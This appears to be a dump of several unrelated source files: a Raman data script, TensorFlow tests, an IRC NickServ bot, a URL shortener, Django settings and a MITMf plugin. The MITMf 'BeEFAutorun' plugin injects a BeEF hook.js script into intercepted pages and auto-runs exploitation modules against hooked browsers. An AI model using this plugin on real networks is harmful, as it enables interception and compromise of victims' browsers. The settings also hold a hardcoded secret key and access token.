# arr[arr!=0]=numpy.log10(arr[arr!=0])
# rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
#ramanimshow(rgbimagedata)
#plt.show()
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
searchforoptimalbool=isinstance(find_edges_sigma_value, list)
ltemp=find_edges_sigma_value if searchforoptimalbool else [find_edges_sigma_value]
plt.clf()
for sigmacount, sigmaval in enumerate(ltemp):
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), sigmacount+1)
for i in range(data_decomp_all.shape[1]):
if nmf_scaling_algorithm_for_edge=='scale_by_max':
datadecomptemp=data_decomp_all[:,i]/data_decomp_all[:,i].max()
elif nmf_scaling_algorithm_for_edge=='scale_log_by_max':
datadecomptemp=data_decomp_all[:,i]
datadecomptemp[datadecomptemp!=0]=numpy.log10(datadecomptemp[datadecomptemp!=0])
datadecomptemp/=datadecomptemp.max()
arr=np.uint8(ramanreshape(datadecomptemp)*254)
edgetemp=findEdges(arr, sigma=sigmaval)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), len(find_edges_sigma_value)+sigmacount+1)
else:
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(maski==1) for maski in l_mask]
l_xycen=np.array([[image_of_x[imageindsi].mean(), image_of_y[imageindsi].mean()] for imageindsi in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen[:-1]) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/5.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
# imageinds=l_imageinds.pop(indhigh)
# mask=l_mask.pop(indhigh)
imageinds=l_imageinds[indhigh]
mask=l_mask[indhigh]
l_mask[indlow][imageinds]=1#update only the masks and then update everythign else afterwards
l_imageinds=[numpy.where(maskj==1) for maskj in l_mask]
l_xycen=np.array([[image_of_x[imageindsj].mean(), image_of_y[imageindsj].mean()] for imageindsj in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
indsinblob=sorted(list(image_of_inds[imageinds]))
relx=(image_of_x[imageinds].max()-image_of_x[imageinds].min())/dx_smp
rely=(image_of_y[imageinds].max()-image_of_y[imageinds].min())/dy_smp
if relx<0.5 or relx>1.4 or rely<0.5 or rely>1.4 or len(indsinblob)<ntot*0.5 or len(indsinblob)>ntot*1.5:
print 'skipped blob that was %.2f, %.2f of expected size with %d pixels' %(relx, rely, len(indsinblob))
continue
if numpy.any(mapfill[imageinds]==1):
print 'overlapping blobs detected'
xc=image_of_x[imageinds].mean()
yc=image_of_y[imageinds].mean()
mapfill[imageinds]=1
blobd[(xc, yc)]=indsinblob
ramanimshow(mapfill)
if searchforoptimalbool:
plt.show()
else:
plt.savefig(pathd['mapfill'])
if show_help_messages:
messageDialog(form, 'The auto detected and cleaned up blobs will be shown.\nThis is an image using the Raman motor coordinates').exec_()
plt.show()
with open(pathd['blobd'], mode='wb') as f:
pickle.dump(blobd, f)
alignui.knownblobsdict=blobd
alignui.openAddFile(p=platemappath)
alignui.image=rgbimagedata
alignui.motimage_extent=extent #left,right,bottom,top in mm
alignui.reloadimagewithextent()
#alignui.plotw_motimage.axes.imshow(alignui.image, origin='lower', interpolation='none', aspect=1, extent=alignui.motimage_extent)
xarr, yarr=np.array(blobd.keys()).T
alignui.plotw_motimage.axes.plot(xarr, yarr, 'wx', ms=4)
alignui.plotw_motimage.fig.canvas.draw()
if show_help_messages:
messageDialog(form, 'NMF analysis done and now plotting NMF image\nwith identified samples marked +. User can choose sample_no and \nright click to add calibration points.\nDo this for at least 1 sample marked with +.').exec_()
alignui.exec_()
alignui.sampleLineEdit.setText(','.join(['%d' %smp for smp in sample_list]))
alignui.addValuesSample()
if show_help_messages:
messageDialog(form, 'sample_no for export have been added. Check that \nthere are no NaN and if there are manually add calibration points\nas necessary and then remove+re-add the NaN samples.').exec_()
alignui.exec_()
alignui.plotw_motimage.fig.savefig(pathd['alignedsamples'])
with open(pathd['alignedsamplestxt'], mode='w') as f:
f.write(str(alignui.browser.toPlainText()))
alignui.openpckinfo(p=pathd['infopck'])
alignui.infox/=1000.
alignui.infoy/=1000.
alignui.perform_genmapfile(p=pathd['map'], **default_sample_blob_dict)
mapfill2=np.zeros(ramaninfod['number of spectra'], dtype='uint8')
for smp, inds in alignui.smp_inds_list__map:
mapfill2[inds]=2 if smp>0 else 1
mapfill2=ramanreshape(mapfill2)
plt.clf()
ramanimshow(mapfill2, vmin=0, vmax=2, cmap='gnuplot')
plt.savefig(pathd['samplepixels'])
if show_help_messages:
messageDialog(form, 'The NMF-identified samples use custom blob shapes and\nthe rest of the requested samples use default sample shape, resulting\nin the following map of pixels that will be exported.').exec_()
plt.show()
parseui.savepathLineEdit.setText(pathd['spectrafolder'])
parseui.match(copypath=pathd['map'])
parseui.extract()
parseui.saveave()
#parseui.readresultsfolder()
if show_help_messages:
messageDialog(form, 'The .rmn files have now been saved, so you can use\nthis next dialog to visualize data or close it to generate\nthe .udi files and open in JCAPDataProcess Visualizer').exec_()
parseui.exec_()
#only initialize visdataDialog so only created when necessary
visui=visdataDialog(form, title='Visualize ANA, EXP, RUN data')
visui.openontheflyfolder(folderpath=pathd['spectrafolder'], plateidstr=plateidstr)
visui.BatchComboBox.setCurrentIndex(2)
visui.runbatchprocess()
savep=pathd['udibasepath']+'all.udi'
visui.get_xy_plate_info_browsersamples(saveudibool=True, ternary_el_inds_for_udi_export=udi_ternary_projection_inds, savep=savep)
for i, indstup in enumerate(itertools.combinations(range(len(visui.ellabels)), 3)):
excludeinds=[ind for ind in range(len(visui.ellabels)) if not ind in indstup]
inds_where_excluded_els_all_zero=numpy.where(visui.fomplotd['comps'][:, excludeinds].max(axis=1)==0)[0]
if len(inds_where_excluded_els_all_zero)==0:
continue
smplist=[visui.fomplotd['sample_no'][fomplotind] for fomplotind in inds_where_excluded_els_all_zero]
visui.remallsamples()
visui.addrem_select_fomplotdinds(remove=False, smplist=smplist)
savep=''.join([pathd['udibasepath']]+[visui.ellabels[ind] for ind in indstup]+['.udi'])
visui.get_xy_plate_info_browsersamples(saveudibool=True, ternary_el_inds_for_udi_export=indstup, savep=savep)
if show_help_messages:
messageDialog(form, 'udi files now saved and JCAPDataProcess\nVisualizer will be opened for your use.').exec_()
visui.exec_()
if show_help_messages:
messageDialog(form, 'There is nothing more to do and continuing will raise an error.').exec_()
errorattheend
|
johnmgregoire/JCAPRamanDataProcess
|
PlateAlignViaEdge_v4.py
|
Python
|
bsd-3-clause
| 16,899 | 0.016214 |
"""Tests for control_flow_ops.py."""
import tensorflow.python.platform
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import standard_ops as tf
from tensorflow.python.platform import googletest
class GroupTestCase(TensorFlowTestCase):
def _StripNode(self, nd):
snode = graph_pb2.NodeDef(name=nd.name, op=nd.op, input=nd.input)
if nd.device:
snode.device = nd.device
return snode
def _StripGraph(self, gd):
"""Copy gd keeping only, node.name, node.op, node.input, and node.device."""
return graph_pb2.GraphDef(node=[self._StripNode(nd) for nd in gd.node])
def testGroup_NoDevices(self):
with ops.Graph().as_default() as g:
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
c = tf.constant(0, name="c")
tf.group(a.op, b.op, c.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const"}
node { name: "b" op: "Const"}
node { name: "c" op: "Const"}
node { name: "root" op: "NoOp" input: "^a" input: "^b" input: "^c" }
""", self._StripGraph(gd))
def testGroup_OneDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
tf.group(a.op, b.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0" }
node { name: "b" op: "Const" device: "/task:0" }
node { name: "root" op: "NoOp" input: "^a" input: "^b" device: "/task:0" }
""", self._StripGraph(gd))
def testGroup_MultiDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
with g.device("/task:1"):
c = tf.constant(0, name="c")
d = tf.constant(0, name="d")
with g.device("/task:2"):
tf.group(a.op, b.op, c.op, d.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0"}
node { name: "b" op: "Const" device: "/task:0"}
node { name: "c" op: "Const" device: "/task:1"}
node { name: "d" op: "Const" device: "/task:1"}
node { name: "root/NoOp" op: "NoOp" input: "^a" input: "^b"
device: "/task:0" }
node { name: "root/NoOp_1" op: "NoOp" input: "^c" input: "^d"
device: "/task:1" }
node { name: "root" op: "NoOp" input: "^root/NoOp" input: "^root/NoOp_1"
device: "/task:2" }
""", self._StripGraph(gd))
class ShapeTestCase(TensorFlowTestCase):
def testShape(self):
with ops.Graph().as_default():
tensor = tf.constant([1.0, 2.0])
self.assertEquals([2], tensor.get_shape())
self.assertEquals([2],
control_flow_ops.with_dependencies(
[tf.constant(1.0)], tensor).get_shape())
if __name__ == "__main__":
googletest.main()
|
liyu1990/tensorflow
|
tensorflow/python/ops/control_flow_ops_test.py
|
Python
|
apache-2.0
| 3,164 | 0.006953 |
#!/usr/bin/python3
'''
This is a * sort * of static method but is ugly since the
function is really global and not in the class.
'''
class Book:
num = 0
def __init__(self, price):
self.__price = price
Book.num += 1
def printit(self):
print('price is', self.__price)
def setPrice(self, newprice):
self.__price = newprice
def getNumBooks():
return Book.num
# lets create some books...
b1 = Book(14)
b2 = Book(13)
# lets access the static member and the static methods...
print('Book.num (direct access) is ', Book.num)
print('getNumBooks() is ', getNumBooks())
try:
print(b1.getNumBooks())
except AttributeError as e:
print('no,cannot access the static method via the instance')
# access the static member through an instance...
print(b1.num)
print(b2.num)
b3 = Book(12)
print(b1.num)
print(b2.num)
print(b3.num)
|
nonZero/demos-python
|
src/examples/short/object_oriented/static_method_1.py
|
Python
|
gpl-3.0
| 881 | 0.001135 |
# -*- coding: utf-8 -*-
import bot
import time
"""
load irc/auth/nickserv
nickserv set password hunter2
config set modules.nickserv.enabled True
config set modules.nickserv.ghost True
nickserv register [email protected]
nickserv verify register myaccount c0d3numb3r
nickserv identify
"""
class M_NickServ(bot.Module):
index = "nickserv"
def register(self):
self.addhook("recv", "recv", self.recv)
self.addhook("login", "login", self.login)
self.addhook("nickinuse", "433", self.nickinuse)
self.addsetting("=name", "")
self.addsetting("=password", "")
self.addsetting("enabled", False)
self.addsetting("auto", True)
self.addsetting("ghost", True)
self.lastns = ""
self.lastnstime = time.time()
self.ghosting = True
self.addcommand(self.register_c, "register",
"Register with NickServ.",
["[-name=account name]", "email"])
self.addcommand(self.verify_c, "verify register",
"Verify with NickServ.", ["account", "code"])
self.addcommand(self.identify_c, "identify",
"Identify with NickServ.", [])
self.addcommand(self.setp, "set password",
"Set the NickServ password.", ["password"])
self.addcommand(self.setn, "set name",
"Set the NickServ name.", ["[name]"])
def setn(self, context, args):
args.default("name", "")
self.setsetting("name", args.getstr("name"))
return "Set name to: %s" % self.getsetting('name')
def setp(self, context, args):
args.default("password", "")
self.setsetting("password", args.getstr("password"))
return "Set password to: %s" % self.getsetting('password')
def name(self):
return self.getsetting("name") or self.server.settings.get(
'server.user.nick')
def recv(self, context):
if context.user[0]:
if context.code('notice') and context.user[0].lower() == 'nickserv':
if context.reciever == self.server.nick:
if self.lastns and time.time() - self.lastnstime < 30:
self.server.sendto("NOTICE", self.lastns,
"NickServ -- %s" % (
context.text,
))
if self.ghosting:
self.server.setnick(self.server.wantnick)
self.ghosting = False
def nickinuse(self, r):
if (self.getsetting("enabled") and
self.getsetting("password") and self.getsetting("ghost")):
self.server.setnick(self.server.nick + "_")
self.server.sendto("PRIVMSG", "nickserv", "GHOST %s %s" % (
self.server.wantnick,
self.getsetting("password"),
))
self.ghosting = True
r.append(True)
def identify(self):
self.server.log("AUTH", "Identifying with NickServ.")
self.server.sendto("PRIVMSG", "nickserv", "IDENTIFY %s %s" % (
self.name(),
self.getsetting("password"),
))
def identify_c(self, context, args):
context.exceptrights(["admin"])
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.identify()
self.lastns = context.user[0]
self.lastnstime = time.time()
def register_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "REGISTER %s %s %s" % (
self.name() if args.getbool('name') else '',
self.getsetting("password"),
args.getstr('email'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def verify_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "VERIFY REGISTER %s %s" % (
args.getstr('account'),
args.getstr('code'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def login(self):
if self.getsetting("enabled") and self.getsetting("password"):
if self.getsetting("auto"):
self.identify()
bot.register.module(M_NickServ)
|
shacknetisp/vepybot
|
plugins/protocols/irc/auth/nickserv.py
|
Python
|
mit
| 4,789 | 0.000418 |
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from time import sleep
from core.beefapi import BeefAPI
from core.utils import SystemConfig, shutdown
from plugins.plugin import Plugin
from plugins.Inject import Inject
mitmf_logger = logging.getLogger("mitmf")
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = SystemConfig.getIP(options.interface)
Inject.initialize(self, options)
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
def startThread(self):
self.autorun()
def onConfigChange(self):
self.initialize(self.options)
def autorun(self):
already_ran = []
already_hooked = []
while True:
mode = self.config['BeEFAutorun']['mode']
for hook in self.beef.hooked_browsers.online:
if hook.session not in already_hooked:
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
already_hooked.append(hook.session)
self.black_ips.append(hook.ip)
if mode == 'oneshot':
if hook.session not in already_ran:
self.execModules(hook)
already_ran.append(hook.session)
elif mode == 'loop':
self.execModules(hook)
sleep(10)
sleep(1)
def execModules(self, hook):
all_modules = self.config['BeEFAutorun']["ALL"]
targeted_modules = self.config['BeEFAutorun']["targets"]
if all_modules:
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
for module, options in all_modules.iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
if (hook.name and hook.os):
for os in targeted_modules:
if (os == hook.os) or (os in hook.os):
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
for browser in targeted_modules[os]:
if browser == hook.name:
for module, options in targeted_modules[os][browser].iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
|
zhuyue1314/MITMf
|
plugins/BeefAutorun.py
|
Python
|
gpl-3.0
| 3,993 | 0.022039 |
import logging
from abc import abstractmethod, ABCMeta
from urllib import request
class UrlShortener(metaclass=ABCMeta):
@abstractmethod
def shorten(self, url: str) -> str:
pass
def log(self, url):
logging.info("Short URL: {}".format(url))
class Off(UrlShortener):
def shorten(self, url: str):
return url
class TinyURL(UrlShortener):
def shorten(self, url: str) -> str:
response = request.urlopen("http://tinyurl.com/api-create.php?url={}".format(url))
url = str(response.read(), encoding="ascii")
self.log(url)
return url
def get_url_shortener(name: str) -> UrlShortener:
if name == "tinyurl":
return TinyURL()
return Off()
|
instantshare/instantshare
|
src/tools/shorturl.py
|
Python
|
gpl-2.0
| 726 | 0.001377 |
"""
Django settings for cadasta project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.utils.translation import ugettext_lazy as _
from .languages import FORM_LANGS # noqa
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@=fy$)xx+6yjo*us@&+m6$14@l-s6#atg(msm=9%)9@%b7l%h('
ALLOWED_HOSTS = ['*']
AUTH_USER_MODEL = 'accounts.User'
SITE_ID = 1
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.gis',
'django.contrib.humanize',
'corsheaders',
'core',
'geography',
'accounts',
'organization',
'spatial',
'questionnaires',
'resources',
'buckets',
'party',
'xforms',
'search',
'tasks',
'django_filters',
'crispy_forms',
'parsley',
'widget_tweaks',
'django_countries',
'leaflet',
'rest_framework',
'rest_framework_gis',
'rest_framework.authtoken',
'rest_framework_docs',
'djoser',
'tutelary',
'allauth',
'allauth.account',
'allauth.socialaccount',
'sass_processor',
'simple_history',
'jsonattrs',
'compressor',
'django_otp',
)
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'audit_log.middleware.UserLoggingMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
'accounts.middleware.UserLanguageMiddleware',
'django_otp.middleware.OTPMiddleware',
)
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework_tmp_scoped_token.TokenAuth',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_VERSIONING_CLASS':
'rest_framework.versioning.NamespaceVersioning',
'DEFAULT_VERSION': 'v1',
'EXCEPTION_HANDLER': 'core.views.api.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework.pagination.LimitOffsetPagination',
'PAGE_SIZE': 100,
'HTML_SELECT_CUTOFF': 100,
}
SITE_NAME = 'Cadasta'
BASE_TEMPLATE_DIR = os.path.join(os.path.dirname(BASE_DIR), 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_TEMPLATE_DIR,
os.path.join(BASE_TEMPLATE_DIR, 'allauth')],
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
],
},
},
]
AUTHENTICATION_BACKENDS = [
'core.backends.Auth',
'django.contrib.auth.backends.ModelBackend',
'accounts.backends.AuthenticationBackend',
'accounts.backends.PhoneAuthenticationBackend'
]
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
DJOSER = {
'SITE_NAME': SITE_NAME,
'SET_PASSWORD_RETYPE': True,
'PASSWORD_RESET_CONFIRM_RETYPE': True,
'PASSWORD_RESET_CONFIRM_URL':
'account/password/reset/confirm/{uid}/{token}',
'ACTIVATION_URL': 'account/activate/{uid}/{token}',
# 'SEND_ACTIVATION_EMAIL': True,
'SERIALIZERS': {
'set_password_retype': 'accounts.serializers.ChangePasswordSerializer'
}
}
CORS_ORIGIN_ALLOW_ALL = False
LOGIN_REDIRECT_URL = '/dashboard/'
LOGIN_URL = '/account/login/'
LOGOUT_URL = '/account/logout/'
WSGI_APPLICATION = 'config.wsgi.application'
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = LOGIN_URL
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 2
ACCOUNT_FORMS = {
'signup': 'accounts.forms.RegisterForm',
'profile': 'accounts.forms.ProfileForm',
}
ACCOUNT_ADAPTER = 'accounts.adapter.DefaultAccountAdapter'
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_LOGOUT_REDIRECT_URL = LOGIN_URL
ACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 86400
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': ('django.contrib.auth.'
'password_validation.UserAttributeSimilarityValidator'),
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 10,
}
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME':
'accounts.validators.CharacterTypePasswordValidator'
},
{
'NAME':
'accounts.validators.EmailSimilarityValidator'
},
]
OSM_ATTRIBUTION = _(
"Base map data © <a href=\"http://openstreetmap.org\">"
"OpenStreetMap</a> contributors under "
"<a href=\"http://opendatacommons.org/licenses/odbl/\">ODbL</a>"
)
DIGITALGLOBE_ATTRIBUTION = _("Imagery © DigitalGlobe")
DIGITALGLOBE_TILESET_URL_FORMAT = (
'https://{{s}}.tiles.mapbox.com/v4/digitalglobe.{}'
'/{{z}}/{{x}}/{{y}}.png?access_token='
'pk.eyJ1IjoiZGlnaXRhbGdsb2JlIiwiYSI6ImNpaHhtenBmZjAzYW1'
'1a2tvY2p3MnpjcGcifQ.vF1gH0mGgK31yeHC1k1Tqw'
)
LEAFLET_CONFIG = {
'TILES': [
(
_("OpenStreetMap"),
'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
{'attribution': OSM_ATTRIBUTION,
'maxZoom': 19}
),
(
_("+Vivid imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6ngnadl'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("Recent imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0g75k'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("+Vivid imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6nhclo2'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
(
_("Recent imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0mpda'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
],
'RESET_VIEW': False,
'PLUGINS': {
'draw': {
'js': '/static/leaflet/draw/leaflet.draw.js'
},
'groupedlayercontrol': {
'js': '/static/js/leaflet.groupedlayercontrol.min.js',
'css': '/static/css/leaflet.groupedlayercontrol.min.css'
}
}
}
# Invalid names for Cadasta organizations, projects, and usernames
CADASTA_INVALID_ENTITY_NAMES = ['add', 'new']
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]
LANGUAGES = [
# ('ar', _('Arabic')), (hiding until RTL support fixed)
('en', _('English')),
('fr', _('French')),
# ('de', _('German')), (hiding until translation coverage >= 75%)
('es', _('Spanish')),
('id', _('Indonesian')),
('it', _('Italian')),
('pt', _('Portuguese'))
# ('sw', _('Swahili')), (hiding until translation coverage >= 75%)
]
MEASUREMENT_DEFAULT = 'metric'
MEASUREMENTS = [
('metric', _('Metric')),
('imperial', _('Imperial')),
]
DEFAULT_AVATAR = '/static/img/avatar_sm.jpg'
ACCEPTED_AVATAR_TYPES = ['image/png', 'image/jpeg']
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = '/opt/cadasta/media'
MEDIA_URL = '/media/'
STATIC_ROOT = '/opt/cadasta/static'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'sass_processor.finders.CssFinder',
'compressor.finders.CompressorFinder',
)
# Required for bootstrap-sass
# https://github.com/jrief/django-sass-processor
SASS_PRECISION = 8
SASS_PROCESSOR_ROOT = os.path.join(STATIC_ROOT, 'cache')
SASS_PROCESSOR_INCLUDE_DIRS = (
'/opt/cadasta/node_modules',
)
SASS_OUTPUT_STYLE = 'compressed'
# django-compressor
# https://django-compressor.readthedocs.io/en/latest/
# change to false for debug
COMPRESS_ENABLED = True
COMPRESS_CSS_FILTERS = (
'compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter',
)
COMPRESS_URL = STATIC_URL
COMPRESS_ROOT = STATIC_ROOT
COMPRESS_STORAGE = 'compressor.storage.GzipCompressorFileStorage'
COMPRESS_OUTPUT_DIR = 'cache'
JSONATTRS_SCHEMA_SELECTORS = {
'spatial.spatialunit': (
'project.organization.pk',
'project.pk', 'project.current_questionnaire'
),
'spatial.spatialrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.party': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire',
'type'
),
'party.partyrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.tenurerelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
)
}
ATTRIBUTE_GROUPS = {
'location_attributes': {
'app_label': 'spatial',
'model': 'spatialunit',
'label': 'Location'
},
'party_attributes': {
'app_label': 'party',
'model': 'party',
'label': 'Party'
},
'location_relationship_attributes': {
'app_label': 'spatial',
'model': 'spatialrelationship',
'label': 'Spatial relationship'
},
'party_relationship_attributes': {
'app_label': 'party',
'model': 'partyrelationship',
'label': 'Party relationship'
},
'tenure_relationship_attributes': {
'app_label': 'party',
'model': 'tenurerelationship',
'label': 'Tenure Relationship'
}
}
ICON_URL = ('https://s3-us-west-2.amazonaws.com/cadasta-resources'
'/icons/{}.png')
ICON_LOOKUPS = {
'application/pdf': 'pdf',
'audio/1d-interleaved-parityfec': 'audio',
'audio/32kadpcm': 'audio',
'audio/3gpp': 'audio',
'audio/3gpp2': 'audio',
'audio/ac3': 'audio',
'audio/aac': 'audio',
'audio/aacp': 'audio',
'audio/amr': 'audio',
'audio/amr-wb': 'audio',
'audio/amr-wb+': 'audio',
'audio/aptx': 'audio',
'audio/asc': 'audio',
'audio/ATRAC-ADVANCED-LOSSESS': 'audio',
'audio/ATRAC-X': 'audio',
'audio/ATRAC3': 'audio',
'audio/basic': 'audio',
'audio/BV16': 'audio',
'audio/BV32': 'audio',
'audio/clearmode': 'audio',
'audio/CN': 'audio',
'audio/DAT12': 'audio',
'audio/dls': 'dls',
'audio/dsr-es201108': 'audio',
'audio/dsr-es202050': 'audio',
'audio/dsr-es202211': 'audio',
'audio/dsr-es202212': 'audio',
'audio/DV': 'audio',
'audio/DV14': 'audio',
'audio/eac3': 'audio',
'audio/encaprtp': 'audio',
'audio/EVRC': 'audio',
'audio/EVRC-QCP': 'audio',
'audio/EVRC0': 'audio',
'audio/EVRC1': 'audio',
